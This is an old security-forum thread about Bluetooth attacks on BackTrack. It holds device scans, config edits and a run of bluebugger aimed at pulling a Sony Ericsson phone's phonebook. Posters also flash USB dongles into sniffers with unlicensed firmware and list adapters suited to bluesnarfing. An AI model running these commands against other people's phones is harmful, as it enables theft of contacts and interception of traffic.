Version: 0x0100

Service Name: SIM Access
Service RecHandle: 0x10011
Service Class ID List:
"SIM Access" (0x112d)
"Generic Telephony" (0x1204)
Protocol Descriptor List:
"L2CAP" (0x0100)
"RFCOMM" (0x0003)
Channel: 8
Language Base Attr List:
code_ISO639: 0x454e
encoding: 0x6a
base_offset: 0x100
Profile Descriptor List:
"SIM Access" (0x112d)
Version: 0x0101

bt ~ # /etc/bluetooth/hcid.conf
-bash: /etc/bluetooth/hcid.conf: Permission denied

imported_=Tron=
08-21-2008, 01:01 PM
bt ~ # /etc/bluetooth/hcid.conf
-bash: /etc/bluetooth/hcid.conf: Permission deniedTry specifying the program to use to edit the .conf file, for example nano /etc/bluetooth/hcid.conf or kwrite /etc/bluetooth/hcid.conf. You could also consider editing out all the additional output in your post since it is in no way relevant to your actual problem. ;)

mahabad1972
08-21-2008, 01:13 PM
what am i suppose to edit is there any manual or advice this is what it come when i put this nano /etc/bluetooth/hcid.conf



# HCI daemon configuration file.
#

# HCId options
options {
# Automatically initialize new devices
autoinit yes;

# Security Manager mode
# none - Security manager disabled
# auto - Use local PIN for incoming connections
# user - Always ask user for a PIN
#
security user;

# Pairing mode
# none - Pairing disabled
# multi - Allow pairing with already paired devices
# once - Pair once and deny successive attempts
# none - Security manager disabled
# auto - Use local PIN for incoming connections
# user - Always ask user for a PIN
#
security user;

# Pairing mode
# none - Pairing disabled
# multi - Allow pairing with already paired devices
# once - Pair once and deny successive attempts
pairing multi;

# Default PIN code for incoming connections
passkey "backtrack";
}

# Default settings for HCI devices
device {
# Local device name
# %d - device id


#iscan enable;
pscan enable;

# Default link mode
# none - no specific policy
# accept - always accept incoming connections
# master - become master on incoming connections,
# deny role switch on outgoing connections
lm accept;

# Default link policy
# none - no specific policy
# rswitch - allow role switch
# hold - allow hold mode
# sniff - allow sniff mode
# park - allow park mode
lp rswitch,hold,sniff,park;

imported_=Tron=
08-21-2008, 01:18 PM
what am i suppose to edit is there any manual or advice this is what it come when i put this nano /etc/bluetooth/hcid.confRe-read the very first post of this thread as it is clearly stated what you are supposed to edit in the hcid.conf file.

open /etc/bluetooth/hcid.conf and replace the lot with this

arisdim
08-22-2008, 06:01 AM
Can someone explain to me why i get "Cannot open '/dev/rfcomm0': Connection refused" message at the end?


bt ~ # hciconfig hci0 up
bt ~ # hciconfig -a
hci0: Type: USB
BD Address: AA:AA:AA:AA:AA:AA ACL MTU: 678:8 SCO MTU: 48:10
UP RUNNING
RX bytes:85 acl:0 sco:0 events:9 errors:0
TX bytes:33 acl:0 sco:0 commands:9 errors:0
Features: 0xbf 0xfe 0x8d 0x78 0x08 0x18 0x00 0x00
Packet type: DM1 DM3 DM5 DH1 DH3 DH5 HV1 HV2 HV3
Link policy:
Link mode: SLAVE ACCEPT
Name: 'ISSCBTA'
Class: 0x000000
Service Classes: Unspecified
Device Class: Miscellaneous,
HCI Ver: 1.2 (0x2) HCI Rev: 0x1fe LMP Ver: 1.2 (0x2) LMP Subver: 0x1fe
Manufacturer: Integrated System Solution Corp. (57)

bt ~ # hcitool scan hci0
Scanning ...
00:11:22:33:44:55 K750i
bt ~ # sdptool browse 00:11:22:33:44:55
Browsing 00:11:22:33:44:55 ...
Service Description: Sony Ericsson K750
Service RecHandle: 0x10000
Service Class ID List:
"PnP Information" (0x1200)

Service Name: Dial-up Networking
Service RecHandle: 0x10001
Service Class ID List:
"Dialup Networking" (0x1103)
"Generic Networking" (0x1201)
Protocol Descriptor List:
"L2CAP" (0x0100)
"RFCOMM" (0x0003)
Channel: 1
Profile Descriptor List:
"Dialup Networking" (0x1103)
Version: 0x0100

Service Name: Serial Port
Service RecHandle: 0x10002
Service Class ID List:
"Serial Port" (0x1101)
Protocol Descriptor List:
"L2CAP" (0x0100)
"RFCOMM" (0x0003)
Channel: 2

Service Name: HF Voice Gateway
Service RecHandle: 0x10003
Service Class ID List:
"Handfree Audio Gateway" (0x111f)
"Generic Audio" (0x1203)
Protocol Descriptor List:
"L2CAP" (0x0100)
"RFCOMM" (0x0003)
Channel: 3
Profile Descriptor List:
"Handsfree" (0x111e)
Version: 0x0101

Service Name: HS Voice Gateway
Service RecHandle: 0x10004
Service Class ID List:
"Headset Audio Gateway" (0x1112)
"Generic Audio" (0x1203)
Protocol Descriptor List:
"L2CAP" (0x0100)
"RFCOMM" (0x0003)
Channel: 4
Profile Descriptor List:
"Headset" (0x1108)
Version: 0x0100

Service Name: OBEX Object Push
Service RecHandle: 0x10005
Service Class ID List:
"OBEX Object Push" (0x1105)
Protocol Descriptor List:
"L2CAP" (0x0100)
"RFCOMM" (0x0003)
Channel: 5
"OBEX" (0x0008)
Profile Descriptor List:
"OBEX Object Push" (0x1105)
Version: 0x0100

Service Name: OBEX File Transfer
Service RecHandle: 0x10006
Service Class ID List:
"OBEX File Transfer" (0x1106)
Protocol Descriptor List:
"L2CAP" (0x0100)
"RFCOMM" (0x0003)
Channel: 6
"OBEX" (0x0008)
Profile Descriptor List:
"OBEX File Transfer" (0x1106)
Version: 0x0100

Service Name: OBEX SyncML Client
Service RecHandle: 0x10007
Service Class ID List:
UUID 128: 00000002-0000-1000-8000-0002ee000002
Protocol Descriptor List:
"L2CAP" (0x0100)
"RFCOMM" (0x0003)
Channel: 7
"OBEX" (0x0008)

Service Name: OBEX IrMC Sync Server
Service RecHandle: 0x10008
Service Class ID List:
"IrMC Sync" (0x1104)
Protocol Descriptor List:
"L2CAP" (0x0100)
"RFCOMM" (0x0003)
Channel: 8
"OBEX" (0x0008)
Profile Descriptor List:
"IrMC Sync" (0x1104)
Version: 0x0100

Service Name: Mouse & Keyboard
Service Description: Remote Control
Service Provider: Sony Ericsson
Service RecHandle: 0x10009
Service Class ID List:
"Human Interface Device" (0x1124)
Protocol Descriptor List:
"L2CAP" (0x0100)
PSM: 17
"HIDP" (0x0011)
Language Base Attr List:
code_ISO639: 0x656e
encoding: 0x6a
base_offset: 0x100
Profile Descriptor List:
"Human Interface Device" (0x1124)
Version: 0x0100

bt ~ # bash /etc/rc.d/rc.bluetooth restart
Stopping Bluetooth subsystem: pand dund rfcomm hidd sdpd hcid.
Starting Bluetooth subsystem: hcid passkeys.
bt ~ # mknod -m 666 /dev/rfcomm0 c 216 1
bt ~ # mknod -m 666 /dev/rfcomm1 c 216 6
bt ~ # mknod -m 666 /dev/rfcomm2 c 216 5
bt ~ # sdptool add --channel=1 DUN
bt ~ # sdptool add --channel=6 FTP
bt ~ # sdptool add --channel=5 OPUSH
bt ~ # hcitool scan hci0
Scanning ...
00:11:22:33:44:55 K750i
bt ~ # bluebugger -m as -a 00:11:22:33:44:55 phonebook

bluebugger 0.1 ( MaJoMu | w ww.codito.de )
-----------------------------------------

Target Device: '00:11:22:33:44:55'
Target Name: 'K750i'

Cannot open '/dev/rfcomm0': Connection refused


I have changed the /etc/bluetooth/hcid.conf with that:

#
# HCI daemon configuration file.
#

# HCId options
options {
# Automatically initialize new devices
autoinit yes;

# Security Manager mode
# none - Security manager disabled
# auto - Use local PIN for incoming connections
# user - Always ask user for a PIN
#
security auto;

# Pairing mode
# none - Pairing disabled
# multi - Allow pairing with already paired devices
# once - Pair once and deny successive attempts
pairing multi;

# Default PIN code for incoming connections
passkey "1234";
}

# Default settings for HCI devices
device {
# Local device name
# %d - device id
# %h - host name
name "device1";

# Local device class
class 0x000000;

# Default packet type
#pkt_type DH1,DM1,HV1;

# Inquiry and Page scan
iscan enable; pscan enable;

# Default link mode
# none - no specific policy
# accept - always accept incoming connections
# master - become master on incoming connections,
# deny role switch on outgoing connections
lm accept,master;

# Default link policy
# none - no specific policy
# rswitch - allow role switch
# hold - allow hold mode
# sniff - allow sniff mode
# park - allow park mode
lp rswitch,hold,sniff,park;
auth enable;
encrypt enable;
}

aghaster
08-29-2008, 11:47 PM
Hi,

I've bought a DBT-120 Rev C1 on ebay. I've booted on Backtrack3 and followed DrGreen's instructions on how to modify the vendor ID and then flash the firmware on the dongle. It now says I have raw access. However, it looks like I missed the point about needing a second dongle for scanning purposes. I have a broadcom dongle that I use for my bluetooth keyboard, could I just use that one along with my sniffer?

Also, what tools should I try to use for sniffing using my new bluetooth sniffer? I found DrGreen's BlueSmash, and csrsniff.c. Thanks

bestia
09-08-2008, 09:01 AM
Can someone explain to me why i get "Cannot open '/dev/rfcomm0': Connection refused" message at the end?


bt ~ # hciconfig hci0 up
bt ~ # hciconfig -a
hci0: Type: USB
BD Address: AA:AA:AA:AA:AA:AA ACL MTU: 678:8 SCO MTU: 48:10
UP RUNNING
RX bytes:85 acl:0 sco:0 events:9 errors:0
TX bytes:33 acl:0 sco:0 commands:9 errors:0
Features: 0xbf 0xfe 0x8d 0x78 0x08 0x18 0x00 0x00
Packet type: DM1 DM3 DM5 DH1 DH3 DH5 HV1 HV2 HV3
Link policy:
Link mode: SLAVE ACCEPT
Name: 'ISSCBTA'
Class: 0x000000
Service Classes: Unspecified
Device Class: Miscellaneous,
HCI Ver: 1.2 (0x2) HCI Rev: 0x1fe LMP Ver: 1.2 (0x2) LMP Subver: 0x1fe
Manufacturer: Integrated System Solution Corp. (57)

bt ~ # hcitool scan hci0
Scanning ...
00:11:22:33:44:55 K750i
bt ~ # sdptool browse 00:11:22:33:44:55
Browsing 00:11:22:33:44:55 ...
Service Description: Sony Ericsson K750
Service RecHandle: 0x10000
Service Class ID List:
"PnP Information" (0x1200)

Service Name: Dial-up Networking
Service RecHandle: 0x10001
Service Class ID List:
"Dialup Networking" (0x1103)
"Generic Networking" (0x1201)
Protocol Descriptor List:
"L2CAP" (0x0100)
"RFCOMM" (0x0003)
Channel: 1
Profile Descriptor List:
"Dialup Networking" (0x1103)
Version: 0x0100

Service Name: Serial Port
Service RecHandle: 0x10002
Service Class ID List:
"Serial Port" (0x1101)
Protocol Descriptor List:
"L2CAP" (0x0100)
"RFCOMM" (0x0003)
Channel: 2

Service Name: HF Voice Gateway
Service RecHandle: 0x10003
Service Class ID List:
"Handfree Audio Gateway" (0x111f)
"Generic Audio" (0x1203)
Protocol Descriptor List:
"L2CAP" (0x0100)
"RFCOMM" (0x0003)
Channel: 3
Profile Descriptor List:
"Handsfree" (0x111e)
Version: 0x0101

Service Name: HS Voice Gateway
Service RecHandle: 0x10004
Service Class ID List:
"Headset Audio Gateway" (0x1112)
"Generic Audio" (0x1203)
Protocol Descriptor List:
"L2CAP" (0x0100)
"RFCOMM" (0x0003)
Channel: 4
Profile Descriptor List:
"Headset" (0x1108)
Version: 0x0100

Service Name: OBEX Object Push
Service RecHandle: 0x10005
Service Class ID List:
"OBEX Object Push" (0x1105)
Protocol Descriptor List:
"L2CAP" (0x0100)
"RFCOMM" (0x0003)
Channel: 5
"OBEX" (0x0008)
Profile Descriptor List:
"OBEX Object Push" (0x1105)
Version: 0x0100

Service Name: OBEX File Transfer
Service RecHandle: 0x10006
Service Class ID List:
"OBEX File Transfer" (0x1106)
Protocol Descriptor List:
"L2CAP" (0x0100)
"RFCOMM" (0x0003)
Channel: 6
"OBEX" (0x0008)
Profile Descriptor List:
"OBEX File Transfer" (0x1106)
Version: 0x0100

Service Name: OBEX SyncML Client
Service RecHandle: 0x10007
Service Class ID List:
UUID 128: 00000002-0000-1000-8000-0002ee000002
Protocol Descriptor List:
"L2CAP" (0x0100)
"RFCOMM" (0x0003)
Channel: 7
"OBEX" (0x0008)

Service Name: OBEX IrMC Sync Server
Service RecHandle: 0x10008
Service Class ID List:
"IrMC Sync" (0x1104)
Protocol Descriptor List:
"L2CAP" (0x0100)
"RFCOMM" (0x0003)
Channel: 8
"OBEX" (0x0008)
Profile Descriptor List:
"IrMC Sync" (0x1104)
Version: 0x0100

Service Name: Mouse & Keyboard
Service Description: Remote Control
Service Provider: Sony Ericsson
Service RecHandle: 0x10009
Service Class ID List:
"Human Interface Device" (0x1124)
Protocol Descriptor List:
"L2CAP" (0x0100)
PSM: 17
"HIDP" (0x0011)
Language Base Attr List:
code_ISO639: 0x656e
encoding: 0x6a
base_offset: 0x100
Profile Descriptor List:
"Human Interface Device" (0x1124)
Version: 0x0100

bt ~ # bash /etc/rc.d/rc.bluetooth restart
Stopping Bluetooth subsystem: pand dund rfcomm hidd sdpd hcid.
Starting Bluetooth subsystem: hcid passkeys.
bt ~ # mknod -m 666 /dev/rfcomm0 c 216 1
bt ~ # mknod -m 666 /dev/rfcomm1 c 216 6
bt ~ # mknod -m 666 /dev/rfcomm2 c 216 5
bt ~ # sdptool add --channel=1 DUN
bt ~ # sdptool add --channel=6 FTP
bt ~ # sdptool add --channel=5 OPUSH
bt ~ # hcitool scan hci0
Scanning ...
00:11:22:33:44:55 K750i
bt ~ # bluebugger -m as -a 00:11:22:33:44:55 phonebook

bluebugger 0.1 ( MaJoMu | w ww.codito.de )
-----------------------------------------

Target Device: '00:11:22:33:44:55'
Target Name: 'K750i'

Cannot open '/dev/rfcomm0': Connection refused


I have changed the /etc/bluetooth/hcid.conf with that:

#
# HCI daemon configuration file.
#

# HCId options
options {
# Automatically initialize new devices
autoinit yes;

# Security Manager mode
# none - Security manager disabled
# auto - Use local PIN for incoming connections
# user - Always ask user for a PIN
#
security auto;

# Pairing mode
# none - Pairing disabled
# multi - Allow pairing with already paired devices
# once - Pair once and deny successive attempts
pairing multi;

# Default PIN code for incoming connections
passkey "1234";
}

# Default settings for HCI devices
device {
# Local device name
# %d - device id
# %h - host name
name "device1";

# Local device class
class 0x000000;

# Default packet type
#pkt_type DH1,DM1,HV1;

# Inquiry and Page scan
iscan enable; pscan enable;

# Default link mode
# none - no specific policy
# accept - always accept incoming connections
# master - become master on incoming connections,
# deny role switch on outgoing connections
lm accept,master;

# Default link policy
# none - no specific policy
# rswitch - allow role switch
# hold - allow hold mode
# sniff - allow sniff mode
# park - allow park mode
lp rswitch,hold,sniff,park;
auth enable;
encrypt enable;
}
have a look at thewheeliekings post (message #105 ) setting the default passkey may help

JF1976
09-09-2008, 07:59 AM
ok so i went off and tryed the sniffer mod, all seamed fine untill i needed to bring the device back up? the firmware went on i think no error was reported by dfutool.. but when i pluged into windows the dongle didnt detect as before!.. i changed the firmware back to the TDK it was set the values to befault and all worked again?

i have attached the required dumps.. 2 & 8 are null? but all others worked.. hope you can help me thanks.

---- UPDATE ----

well i managed to get windows to detect my device as a comprobe, but linux is unable to use it ?

JF1976
09-10-2008, 09:04 AM
ok so this is what i did extra

after all was fine with the VID&PID i uploaded the firmware and then

# lsusb
Bus 3 Device 11: ID 0a12:0321 Cambridge Silicon Radio, Ltd

displayed the above ? 0321 so i had a look about and found this

# bccmd psget -s 0x0000 0x02cb
USB DFU product ID: 0x0321 (801)

so i changed it to this

# bccmd psset -s 0x0000 0x02cb 0x0002

I booted into windows and waited a while for device detection etc to
finish, removed my old device from device manager and run a scan for new
hardware and before i new it i was being asked the usual, again i selected the
bluetoothcomprobe.inf file but this time it all started working for me and i
now have a device listed in device manager as,

"Frontline Test Equipment Bluetooth ComProbe",

but i am still unable to get it working ? arrrrr someone give me a clue lol

Dreamlocked
09-14-2008, 05:29 AM
Does anyone know what is the class, in hcid.conf, of an audio headset device?
(As for instance 0x50204 corresponds to a phone).

- DL

Lord MuffloN
09-23-2008, 06:37 PM
Can anyone post a updated list or say a few good USB bluetooth adapters that can be used for bluesnarfing amongst other things, I've only found posts saying what core they have, not manufacturers or models, and from what I've googled the list from evilgenius.de seems to be outdated and finding info what models use what cores seems to be impossible!

celtec
10-05-2008, 12:40 AM
I've tried to upgrade an USBBT100 suggested by forum post, but dfutool get error: Canít find any DFU devices.
Can someone help me to understand which USB dongle from listed in thread can be used to upgrade frontline DFU firmware without problem ?
Many thanks in advance
celtec

djails
10-20-2008, 07:02 PM
Hi all,
I own a belking F8T001 ver 2 usb bluetooth dongle, and it has a bluecore2-ext chip:

# lsusb -s 3:26
Bus 003 Device 026: ID 050d:0084 Belkin Components
# hciconfig hci0 revision
hci0: Type: USB
BD Address: 00:0A:3A:57:26:86 ACL MTU: 192:8 SCO MTU: 64:8
HCI 16.14
Chip version: BlueCore02-External
Max key size: 56 bit
SCO mapping: HCI

I changed the USB VID & PID to 0a12:0002 (using "bccmd psset"), and flashed the dongle with airsnifferdev47bc2.dfu (using "dfutool"). All went well, and it seems the dongle is in raw mode:


# lsusb -s 3:27
Bus 003 Device 027: ID 0a12:0002 Cambridge Silicon Radio, Ltd
# hciconfig
hci0: Type: USB
BD Address: 00:0A:3A:57:26:86 ACL MTU: 0:0 SCO MTU: 0:0
UP RUNNING RAW
RX bytes:18 acl:0 sco:0 events:0 errors:0
TX bytes:3 acl:0 sco:0 commands:1 errors:0
I havent done anything else (not sure whether it is required to switch to windows and run the FTS4BT program ... )
From another computer (00:15:AF:F9:5F:96), I l2ping a paired BT headset (00:13:17:48:60:97). Using the bluetooth sniffer, I tried capturing the ping packets using frontline:


# ./frontline -d hci0 -s
# ./frontline -d hci0 -f 7
# ./frontline -d hci0 -S 00:13:17:48:60:97@00:15:AF:F9:5F:96
# ./frontline -d hci0 -e
Unknown type: 4

# ./frontline -d hci0 -s
It seems the sniffer doesnt... sniff ! I also tried sniffing pairing packets, but no success there either. The only output of "frontline -d hci0 -e" is "unknown type 4" and "unknown type 1" every now and then.
Questions:
is it possible to turn a BC2-ext dongle into a sniffer with the airsnifferdev47bc2.dfu firmware ?
Should I use another firmware ?
Did I miss a step when flashing the firmware (use FTS4BT for example) ?
Is there a problem with my invocations of frontline ?


Thanks guys and congrats to DrGreen for a great tut !

bofh28
11-17-2008, 04:10 PM
After searching the forums for usb bluetooth dongle I have made a list of usb bluetooth dongles that should work in BT and be flashable. It would be nice if someone added this list to the hcl on the wiki.

usb bluetooth adapters compatible with backtrack
belkin F8T001 ver 2
flashed, but not sniffing
http://forums.remote-exploit.org/showpost.php?p=103881&postcount=152

D-Link DBT-120 rev. C (bluetooth v 1.1)
works
http://forums.remote-exploit.org/showpost.php?p=90639&postcount=128

From http://www.evilgenius.de/2007/04/10/bluetooth-dongle-with-csr-chipset-and-flash-or-external-memory-using-flash/
Fujitsu Siemens Bluetooth dongles S26361-F3214-L10
works

Linksys USB BT-100 Rev 1(older units only, the newer ones seem to use a broadcom chipset and won't flash)
works

Cellink BTA-6030 Bluetooth Adapter
works but not available

Aircable Host XR (class 1, sma connector)
works
http://www.evilgenius.de/2007/08/13/updates-on-aircable-host-xr-30km-bluetooth-link/

DELOCK 61478 (class 2)
Toshiba PA3455U-1BTM (class 2)
works
http://forums.remote-exploit.org/showpost.php?p=67132&postcount=81


dongles to AVOID:
D-Link dbt-122 has a broadcom chipset

A7eng eb502-HCI
works only with factory firmware and doesn't appear to be available anymore

TBW-104UB
ROM
http://bluetoothsecurity.wordpress.com/list-of-bluetooth-hardware-for-hacking-purposes/

Kensington Bluetooth USB Adapter 2.0 33348 (Rev. 5.1.0.1700 and Rev. 6.0.1.5100)
broadcom
http://us.kensington.com/html/1492.html

IOgear GBU321
broadcom BCM2045
http://www.hawkee.com/shop/prod/653273/reviews/review_75852 in the reviews section

IOgear GBU421
user reported

johnix666
11-18-2008, 09:59 PM
i bought a D-Link DBT-120 and i confirm it works!
thanx bofh28

bofh28
11-19-2008, 08:36 AM
i bought a D-Link DBT-120 and i confirm it works!
thanx bofh28

You are welcome.

akegameesou
11-23-2008, 10:16 PM
johnix666,


I have read through Dr_GrEens howtos watched several vids etc. I have the D-Link DBT-120 Bluetooth USB device also. How ever I can not seem to get it to scan as many have posted using commands such as 'hcitool scan hci0'.

I am currently using my laptop with Backtrack3 and my DBT-120 BlueTooth device and I have been reading the Dr_GrEens blogspot and these forums to get an answer with no avail. I would be greatful if you or anyone here can help me to get my Dongle working with BackTrack 3.

How do I get a copy of the sniffer firmware airsnifferdev46bc4.dfu and forntline.c? Is it purchased of can i just ask for a copy here?

FYI the device is recognized by BT3 on my laptop but things like 'hcitool scan hci0' does not work when trying to scan for my cell phone bluetooth services.

Help would be much appreciated.

Thanks
Ake

bofh28
11-24-2008, 10:57 AM
johnix666,
How do I get a copy of the sniffer firmware airsnifferdev46bc4.dfu and forntline.c? Is it purchased of can i just ask for a copy here?

Ake

Legally you need to spend $10000 to purchase the FTS4BT system from http://www.fte.com/
Using their firmware without purchasing it is illegal.

HighPointSecurity
11-24-2008, 06:37 PM
Before you can use commands like hcitool scan hci0, you first have to enable hci0. By entering; "hciconfig hci0 up" ...
Did you do this ??

HighPointSecurity
11-24-2008, 06:45 PM
As far as I know the chip type has to be: Manufacturer: Cambridge Silicon Radio (10)

Good luck ;)

bofh28
11-24-2008, 08:17 PM
As far as I know the chip type has to be: Manufacturer: Cambridge Silicon Radio (10)

Good luck ;)

And avoid the ones with ROM in the configuration as they are not flash updateable. Unfortunately there is no way to tell a good chipset from a bad one without buying it and trying it.

akegameesou
11-26-2008, 11:23 PM
Yes i had enabled my device with 'hciconfig hci0 up' . The device is enabled fine. Following is the output of the device using 'hciconfig -s hci0'

bt ~ # hciconfig -a hci0
hci0: Type: USB
BD Address: 00:17:9A:2B:5D:53 ACL MTU: 384:8 SCO MTU: 64:8
UP RUNNING
RX bytes:79 acl:0 sco:0 events:8 errors:0
TX bytes:30 acl:0 sco:0 commands:8 errors:0
Features: 0xff 0xff 0x8f 0xfe 0x9b 0xf9 0x00 0x80
Packet type: DM1 DM3 DM5 DH1 DH3 DH5 HV1 HV2 HV3
Link policy:
Link mode: SLAVE ACCEPT
Name: 'D81ZFKB1'
Class: 0x000104
Service Classes: Unspecified
Device Class: Computer, Desktop workstation
HCI Ver: 2.0 (0x3) HCI Rev: 0x77b LMP Ver: 2.0 (0x3) LMP Subver: 0x77b
Manufacturer: Cambridge Silicon Radio (10)

As you can tell by the output this bluetooth dongle is supported as spoken of on these forums and is one that works.

So, I do not have the firmware/software because I do not want to spend thousands of dollars just like everyone else, but i would like to perform scans on my own devices for educations purposes obviously. What can I do with Backtrack 3 and my current DBT-120 bluetooth dongle with factory settings to connect or scan my mobile device?

Can anyone point me to any documentation on this or provide more intel as to how I can or why i can not see any results when I issue the command 'hcitool scan hci0' ?

I appreciate all the help and responses.

Ake

bofh28
11-27-2008, 08:43 PM
hciconfig hci* revision

And if you see EXT excellent but if you see ROM you are no go

akegameesou
11-27-2008, 10:18 PM
here is the output when the command you mention

bt ~ # hciconfig hci* revision
hci0: Type: USB
BD Address: 00:15:9C:2A:5E:54 ACL MTU: 384:8 SCO MTU: 64:8
HCI 19.2
Chip version: BlueCore4-External
Max key size: 56 bit
SCO mapping: HCI

bofh28
11-28-2008, 03:04 PM
here is the output when the command you mention

Chip version: BlueCore4-External


That device can be flashed, but doing so is illegal.

akegameesou
11-28-2008, 09:24 PM
What do i flash it with, can you point me to documentation online or provide me with firmware to flash?

Can i not just use it as is without flashing?

Do you have any Idea why I can not use the command 'hcitool san hci0' to list my bluetooth phone in the output.

all your help is appreciated.

Ake

bofh28
11-28-2008, 10:07 PM
What do i flash it with, can you point me to documentation online or provide me with firmware to flash?

Can i not just use it as is without flashing?

Do you have any Idea why I can not use the command 'hcitool san hci0' to list my bluetooth phone in the output.

all your help is appreciated.

Ake

What are trying to do? If you want a bluetooth sniffer you will need to flash the device with a special firmware that allows sniffing. Doing this without purchasing the firmware is illegal. I don't think anyone on this site will provide you with the firmware as that too is illegal. If memory serves you need two devices. One to sniff, one to scan.

Yes you can use the device without flashing it. It should work fine to connect your phone or pda to PC/laptop.

I don't know why your command isn't working. Perhaps bluetooth is disabled on the phone or setup not to be found??

I am not a bluetooth expert, in fact I don't own any bluetooth equipment.

lizdainis
12-12-2008, 10:43 AM
Need help
i'll did everything and when i write
hcitool scan hci0
"Device is not available: Nosuch device"
what i did wrong ?

JF1980
12-14-2008, 08:15 AM
From what I can make out, al bluetooth hacks still need you to be paired with the victim?

Thick_James
12-29-2008, 12:41 AM
Just a shot in the dark are you using VMware? If you are you can try connecting it to the VM and then try configing it i got that same error until irealized it was still connected to my host and not the guest i felt so stupid lmao that was just a thought so forgive me in advance if i have insulted your intelligence.

imported_dragracekid
01-04-2009, 06:54 PM
Hello all,
I have an Iogear gbu421 I was wondering if there is a way to flash it? Ive searched with no success thank you for your help

bofh28
01-05-2009, 01:52 PM
Hello all,
I have an Iogear gbu421 I was wondering if there is a way to flash it? Ive searched with no success thank you for your help

do
# hciconfig hci* revision

And if you see EXT it is flashable but if you see ROM it can't be flashed. Post your results please so I can update the list.

imported_dragracekid
01-05-2009, 07:21 PM
do
# hciconfig hci* revision

And if you see EXT it is flashable but if you see ROM it can't be flashed. Post your results please so I can update the list.

I may have done it wrong but this is what I get.


hci0: Type: USB
BD Address: 00:02:72:15:40:DD ACL MTU: 1017:8 SCO MTU: 64:0
Firmware 0.67 / 14

bofh28
01-05-2009, 09:12 PM
I may have done it wrong but this is what I get.


hci0: Type: USB
BD Address: 00:02:72:15:40:DD ACL MTU: 1017:8 SCO MTU: 64:0
Firmware 0.67 / 14

Odd. Very odd. There are several lines of output that are missing. There should something like the following after your output:
HCI 16.14
Chip version:
Max key size:
SCO mapping:

Since the information is missing I am going to guess that the adapter is not flashable. Return it the place you bought it, if you can. I have a list adapters that are known to be flashable at http://forums.remote-exploit.org/showpost.php?p=107124&postcount=153
I will add the gbu421 as one NOT to buy.

simplepr
01-12-2009, 08:16 AM
Hi all it is great to participate in this forum I reall like the kind of work being done here. I have a few questions that I would really appreciate answers on. I have read this whole post to make sure that I don't ask something that has been answered but I could have missed something.
1. Can someone post a picture of the correct adapter? There are so many different models that it makes it dificult to know which is the correct one.
I am looking at the D-Link 120 but so many different models.
2. The adapter that works is it USB 2.0 or 1.1?
3. Yes or No two USB dongles needed? One for sniffing and one for connecting?
4. The firmware ubdate on the device is for Windows or does it need to be ubdated for BT3 as well?

Realize I am not asking how to do anything I will read the tutorials and perform whatever needs to be done and hopefully make contributions to the thread with my findings.

simplepr
01-12-2009, 11:55 AM
Guys,
Here is a list of devices with the CSR chipset. Interesting that there are many more than found in this forum. But does this mean they work or are we still looking for specific ones.
xxxjasmine.org.uk/~simon/mirrors/bluez/devicesxxx

bofh28
01-12-2009, 02:24 PM
Hi all it is great to participate in this forum I reall like the kind of work being done here. I have a few questions that I would really appreciate answers on. I have read this whole post to make sure that I don't ask something that has been answered but I could have missed something.
1. Can someone post a picture of the correct adapter? There are so many different models that it makes it dificult to know which is the correct one.
I am looking at the D-Link 120 but so many different models.
2. The adapter that works is it USB 2.0 or 1.1?
3. Yes or No two USB dongles needed? One for sniffing and one for connecting?
4. The firmware ubdate on the device is for Windows or does it need to be ubdated for BT3 as well?

Realize I am not asking how to do anything I will read the tutorials and perform whatever needs to be done and hopefully make contributions to the thread with my findings.

There is a link that provides a list of adapters that are known to work:
http://forums.remote-exploit.org/showpost.php?p=107124&postcount=153
3. Yes I think two adapters are still needed. Can someone verify this?
4. To use one of the listed adapters as a sniffer you would need to flash the adapter with firmware that you did not purchase. Since you didn't purchase it doing so is illegal.

simplepr
01-12-2009, 10:34 PM
[QUOTE=bofh28;114625
4. To use one of the listed adapters as a sniffer you would need to flash the adapter with firmware that you did not purchase. Since you didn't purchase it doing so is illegal.[/QUOTE]

Well that's interesting in the tutorial there is nothing about the legality of this modification and it looks to me that all that is being done is modifying some parameters in the device itself "some one correct me if I am wrong." Also the way I read it is that the firmware upgrade is needed if working on Windows but I could be wrong.

bofh28
01-13-2009, 03:52 PM
Well that's interesting in the tutorial there is nothing about the legality of this modification and it looks to me that all that is being done is modifying some parameters in the device itself "some one correct me if I am wrong." Also the way I read it is that the firmware upgrade is needed if working on Windows but I could be wrong.

Since you own the device you can usually do anything you want to it i.e. run over it in a car, take a hammer to it, use it as a paper weight, etc. Modifying some parameters in the device is usually OK (always check your local laws) but if you break it you have voided the warranty so don't expect a replacement.

The firmware you need to flash allows the dongle to sniff bluetooth traffic and is only available from frontline www.fte.com and costs about $10,000 US. For that price you also get a dongle that supports Bluetooth 2.1+EDR. I haven't seen anyone finding a bluetooth 2.1 dongle that is flashable.

Something interesting I have seen is some new wireless cards are also bluetooth adapters. It took them long enough to figure out that bluetooth uses the same freqency as 802.11b and g. I don't own any of these new adapters so I can't comment about anything other than they exist.

whitedraven
01-13-2009, 07:04 PM
great tutorial!!!
got bt up and running, but beyond that my curiosity ended as the signal strength limited me, and im still racing into learning other areas.

simplepr
01-13-2009, 10:50 PM
Since you own the device you can usually do anything you want to it i.e. run over it in a car, take a hammer to it, use it as a paper weight, etc. Modifying some parameters in the device is usually OK (always check your local laws) but if you break it you have voided the warranty so don't expect a replacement.

The firmware you need to flash allows the dongle to sniff bluetooth traffic and is only available from frontline and costs about $10,000 US. For that price you also get a dongle that supports Bluetooth 2.1+EDR. I haven't seen anyone finding a bluetooth 2.1 dongle that is flashable.

Something interesting I have seen is some new wireless cards are also bluetooth adapters. It took them long enough to figure out that bluetooth uses the same freqency as 802.11b and g. I don't own any of these new adapters so I can't comment about anything other than they exist.

Ok got the picture now bofh28. Thanks for the information! Now I see what is really going on. That said I think we can come up with our own firmware that way we are not running into some one else business I am willing to make any contributions on the development of new firmware even if it takes destroying a few devices by testing I can also support in the investigation process of the chip set i.e. OP codes etc...
Do you guys think its doable? I know bluetooth is a standard and there is much information available if you google it!

simplepr
01-22-2009, 07:49 AM
Ok I have managed to make a sniffing dongle work both in BT3 and in Windows.:) It is a dLink BT120 C1 flashed with 47bc4.dfu I am waiting on my second dongle to arrive so that I can start scanning. My intentions is to pass on what I learn from all this so I am inclined on writing a step by step tutorial for all this. From what I read here there is not much to do since blutooth technology has evolved and no longer vulnerable "Yeah right!":D just like every OS and software out there. I do not believe that is no longer vulnerable its just that none have been found yet or published but this is what its all about right! finding the vulnerabilities and properly documenting them so that we can protect ourselves and our customers, companies etc.... So I want to test test test and post my findings those who wish to do the same are welcome to post.

OnkelDoktor
06-07-2009, 05:33 PM
